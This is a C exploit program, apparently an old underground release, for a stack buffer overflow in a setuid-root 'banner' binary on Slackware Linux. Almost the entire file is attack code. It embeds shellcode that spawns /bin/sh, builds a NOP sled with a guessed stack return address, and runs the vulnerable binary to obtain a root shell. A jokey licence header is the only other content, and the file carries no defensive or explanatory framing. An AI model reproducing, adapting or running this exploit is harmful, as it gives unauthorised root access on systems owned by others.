/***********************************************
 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
 ***********************************************/
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */

/*
 *  banner.c exploit
 *  lore
 *
 *  banner exploit which works with all versions of slackware
 *
 *  Note: banner has to be setuid root (30% of systems i ran accross had
 *  banner installed suid root)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char            hellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh.........";

/*
 * From banner.c
 */
#define MAXSEG (1024)

#define BSIZE  (MAXSEG)
#define ESIZE  ((BSIZE+8))
#define PATH   ("/usr/bin/banner")
#define OFFSET (400)
#define NOP    (0x90)

int main        __P((int, char **));
long get_esp    __P((void));

long
get_esp(void)
{
    __asm__("movl %esp, %eax");
}

int
main(int argc, char **argv)
{
    int             offset,
                    i,
                    j;
    long            addr;
    char           *evilbanner;

    evilbanner = (char *) malloc(ESIZE);
    offset = OFFSET;

    for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
        evilbanner[i] = NOP;

    for (j = 0; i < (ESIZE - 4); ++j, ++i)
        evilbanner[i] = hellcode[j];

    if (argc > 1)
        offset = atoi(argv[1]);

    addr = (get_esp() - offset);

    *(long *) (evilbanner + i) = addr;


    fprintf(stderr, "banner exploit, lore\n");
    fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);

    execl(PATH, "banner", evilbanner, NULL);
}


syntax highlighted by Code2HTML, v. 0.9.1